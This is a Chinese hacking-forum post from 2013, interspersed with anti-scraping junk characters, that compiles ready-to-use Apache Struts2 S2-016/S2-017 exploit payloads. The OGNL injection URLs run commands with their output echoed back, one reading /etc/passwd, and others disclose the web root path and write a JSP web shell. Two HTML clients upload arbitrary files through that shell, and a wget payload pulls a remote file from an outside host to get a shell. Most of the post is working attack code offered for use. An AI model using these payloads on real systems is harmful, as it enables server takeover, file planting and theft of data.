中国网络渗透测试联盟

标题: Struts2 S2-016/S2-017漏洞执行代码 [打印本页]
作者: admin    时间: 2013-7-18 23:03
标题: Struts2 S2-016/S2-017漏洞执行代码
大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。" I2 U. E* @8 x, \2 r$ d+ N  |

, j9 [9 Q/ w- ^( y喜欢就点一下感谢吧^_^# h# Y: i3 |& x' A) V+ l

  B7 o- X' G/ m( \- R3 Q带回显命令执行:! c6 @8 W9 f3 ]; q, m
8 s2 U3 M. M  A: Y7 s4 I
http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
9 n3 A- ~; i9 o# S9 X2 ^  d1 l5 l3 C
9 Y$ Y' p3 l+ S6 T5 N! g8 p* d  @
) l4 B$ J4 Z. S* C6 J+ y. T' d1 N- W  W# a. ~) _5 y4 s9 r) F) l: q

# A6 _! ?! h% f8 W0 G
" y! L$ a/ n" c% c; ~; j! Z8 G% h: A6 R) u9 `
! a3 _' V3 {3 ~/ K9 L( m! A
爆路径:# r- y" `# C+ L$ l
( d7 o; H8 ~. _
http://www.example.com/struts2-b ... 8%29.close%28%29%7D4 K1 P( S9 Y" [! H6 j7 H' h

" `* i0 v6 N$ X6 ?- L
$ k' @- u/ t! }( ~0 Q* s& V- [  I" h0 f% E
4 J+ M) o% f$ x+ Q; G' m% y
+ h8 p: H* _$ A* P1 a9 ^
写文件:6 R. w, |) }2 C) M
& h' H! H/ p' g
http://www.example.com/struts2-blank/example/X.action?redirect:${; S7 w3 h! [/ z& j
1 A$ i" d# I. g, [5 }+ c  l
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
$ s* D+ M# h% W& T$ I
* [1 r8 P, X0 U$ |%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),' P3 v9 x$ a& }" A# V
- J# z1 v* f3 T: j; A1 A3 }0 N5 c* H
new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()
/ a' d( H1 H) @" ^% g! |, d& V( @" h) H$ K! ~
}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e' n2 n6 B. p& l) l
. i+ w, m" y! \

# \) v9 o, ~; z3 i+ H2 r; K+ R4 V6 Y/ F2 x9 E  Z2 e4 j! t
写入的文件内容:
; E% K; t/ p& T. E3 ]" B6 S' Y$ L( Y. v5 X6 {" }0 ^" J
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>      
2 p& Y& h5 {( ^& L& g) R
; V& t7 ^( J! h7 o0 F. f* {. r. r7 r& c其实就是一个jsp的小马,需要客户端配合                                                                                 
! _* I3 \3 y/ g: _$ v
3 s  M0 B* y3 n函数f是文件名,t是内容
" h9 h4 o  V* N: u! U$ N8 e% v& l$ ]+ F
客户端:% t6 b6 w& l3 d6 _( M
+ s) I7 M2 T+ D/ Y0 |
<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">$ |! A0 M9 z  L: H5 ~' E) M6 ?

: ^# W) [3 O0 Q3 L' ]9 u* `. J- U+ C<textarea name=t cols=120 rows=10 width=45>your code</textarea>! x6 n/ c8 g+ z$ ?( ~

7 b' a' ?" E2 D" w, i# a! r<center>
/ Y9 u3 ]& U, N: w9 k7 G( o& K3 h# }
$ I) [0 c1 W! D5 ^

: r, M8 h! s2 ?/ `1 u/ p<input type=submit value="提交">
) V6 h( |1 }) j8 q. \6 f& B& }' Q
( M: N& i* N9 k+ _$ I</form>! e/ d$ U/ b# n4 Q$ ]
8 r2 ~: s( [, L2 H, T( l
就在当前目录建立一个fjp.jsp! A2 j: u" F# B5 Z6 B9 F$ ]
- a( j4 u) j/ Z; B. m
shell:http://www.example.com/struts2-blank/example/fjp.jsp
+ \- \: q: L: A3 d) T0 ~. O) d0 v; |3 j! q2 y- l

9 i" x3 g* M2 V: i1 p* W! o
8 b; w  `% E7 ^/ r; y% f, l还有@园长的一个客户端:& J( b/ p+ I; l: ?
8 w) M4 o) n1 J% V" O9 y
<html>9 U5 S! X6 N7 j6 Z* U% E9 J$ s! j( ^
6 g, ~4 u" U) g7 J9 n8 W# t: b
<head>
: l$ V6 F) c) S' r* ~3 U! z
& X' x0 d  ^, |& A<meta http-equiv="content-type" content="text/html;charset=utf-8">. ^4 `& y1 S& x( o$ {

9 d& I6 w& F& r" T. f+ M: A( I<title>jsp-园长</title>
" w4 }+ Q* K0 M+ w% S! b
9 \/ M4 g% t6 O: P! z! d$ C, G- f</head>
( m. l3 u( t: p8 t- T! t# ]3 F" A: C# S$ p
<style>
. H3 M& A3 c+ e4 N3 b
  x6 E) _6 T! W.main{width:980px;height:600px;margin:0 auto;}
  u. I4 R1 q# f, f6 h  \$ t' E5 i; c$ v6 |5 p# k( W
.url{width:300px;}! h  y4 X' d' o4 U. a1 f6 k4 [# b3 Y
$ P) A& @" \$ U
.fn{width:60px;}
; x6 E5 H2 l- P' i2 t. C" K
; j/ w# }* G* r) v  ~" j3 V7 r.content{width:80%;height:60%;}5 s$ c( x, n& q0 i
, G5 E; D8 ?6 K6 ?- u6 _/ ]- i
</style>
' B8 f2 C' y" }+ x! a+ I* [( ^# S" B! l+ b
<script>
; f. g& ^, P* D; ]4 e+ P& n7 ~; z2 C2 g; U" O4 X
  function upload(){
9 R& e5 `. d: M$ [$ Y/ B0 b. U; i# I5 J3 _2 }9 o: s8 t' U
    var url = document.getElementById('url').value,
6 O$ @! v/ C3 n  ]+ G
" e1 g" {( ^* S* p0 f      content = document.getElementById('content').value,* }6 a% p: }: A( d0 ~2 b2 ]  b9 O' g0 |
+ i: s0 R) _$ U  Z& u+ ^# r
      fileName = document.getElementById('fn').value,
) }; I0 ^  e! J( z8 b
) B6 Z4 p; P8 V  i% M/ e      form = document.getElementById('fm');
2 J- {9 J( ^; ^; O8 e7 n# k1 M7 U% n+ e4 U) V
    if(url.length == 0){
' O3 J  K8 f/ \% I$ b! i2 O2 ^$ }  A6 @
      alert("Url not allowd empty!");
4 G. a* \& C/ Q) X7 w: Y
1 P: \$ j5 n; A1 C* t1 K, P9 t3 x7 p      return ;# K/ V& Y% V( i: d& o! P- N+ @

( X+ \$ _5 o, e' i8 Y) F    }
" s$ ~3 U. w$ x# j/ ~  Y6 ?  v* {2 f) n* P/ Y/ ~1 Q
    if(content.length == 0){8 ^7 z: T; h4 E) `- K
, \( |( N$ z( p* c/ E. H
      alert("Content not allowd empty!");
, ?! n  @/ ~0 g0 R, `! N8 ^/ r6 m9 M& q) M  c# Y
      return ;; i/ g1 |* Y; |  Y! m0 s1 U

/ d2 H2 ~9 v$ l% x' Q    }
4 Y" I7 _/ l' @# J; I- w+ g
! v& w( J6 @. X0 }. a. h- {. S% w    if(fileName.length == 0){
* A( ?# w1 V7 Q# E) `& q
  D% l5 F' t% Z7 b$ V' n      alert("FileName not allowd empty!");$ D7 x$ b, {5 _' T: d
" D! U* ^7 o( G3 H
      return ;
1 a9 l, o7 a, k# j/ _6 O( z/ w3 v" l! w6 E$ o. l* @
    }
4 N: \2 Q9 S$ ~# M; `  |% _
4 c0 W2 S+ b' B7 t    form.action = url;6 `8 i$ [4 b. `
: ]' x' B' L' r& N9 Q3 m* [% C; }( \
    form.submit();
3 I% }* p$ @) I, A7 D, C
' V7 t3 \+ G+ D! c! Y: f4 w  }# H- A. \$ ^% d
; Y' i* y; b- W5 U
</script>
; n0 b. Q) p* C, a
, I% y$ j: l; d7 W) @0 L. ~<body>' r0 T( R3 |# Q" i. q

$ Y% `: ]  ?* B) i% K<div class="main">
' v9 n1 h$ }7 g8 r" |  Q+ A! y& H0 K5 C4 u
  <form id="fm" method="post">  / L: W6 \2 F6 t; W  t) l' p3 G

: U$ y+ ?5 q$ F$ M$ d    URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>  " X) z6 R/ M/ X7 K

" S# D' K% u' Q- p0 N% S    FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />  ; h- T$ L0 [( Y  f! h
3 z; }4 l+ m) Q& t# K2 [4 O
    <a href="javascript:upload();">Upload</a>6 o( u/ w6 K) n

: V) d2 ?5 S! ]3 l6 i$ a7 ^+ m" P- y2 e5 `
, h: |1 v5 N3 V) Y$ x
    <textarea id="content" class="content" name="t" ></textarea>( k& m" ~$ B8 M3 M( t: k# e/ t
5 j3 c5 O6 T4 @" U
  </form>
2 V* ?5 Q' K, T1 Z1 q, G0 s/ Q, r$ L# ?0 i  E4 U, j9 Y0 r
</div>: r3 C- V* q8 [6 ^- F/ `7 u% D1 L) t

2 a8 X9 k- K- N/ ~</body>
/ i$ w* a7 ?( ?( k* ~' l0 F5 u% U( O# Y& c' j
</html>
, m5 j! P, R2 E2 ~# V
, a  F, S% }1 x; z/ r, W  O% I0 g: X, x# B4 e4 \  R
& U* l& C9 v( P- k; n
还有@X发的一个wget的getshell7 s* x! M- ~: R7 _- r& l/ g. ?0 G

% p6 M1 t. W) c) F  U- d?redirect{%23a%3d(new  java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}3 X0 L  B7 e1 J' z4 |

4 M! d7 ^) h: t6 d# r)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}
# `; o6 ]! S) k4 B复制代码



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2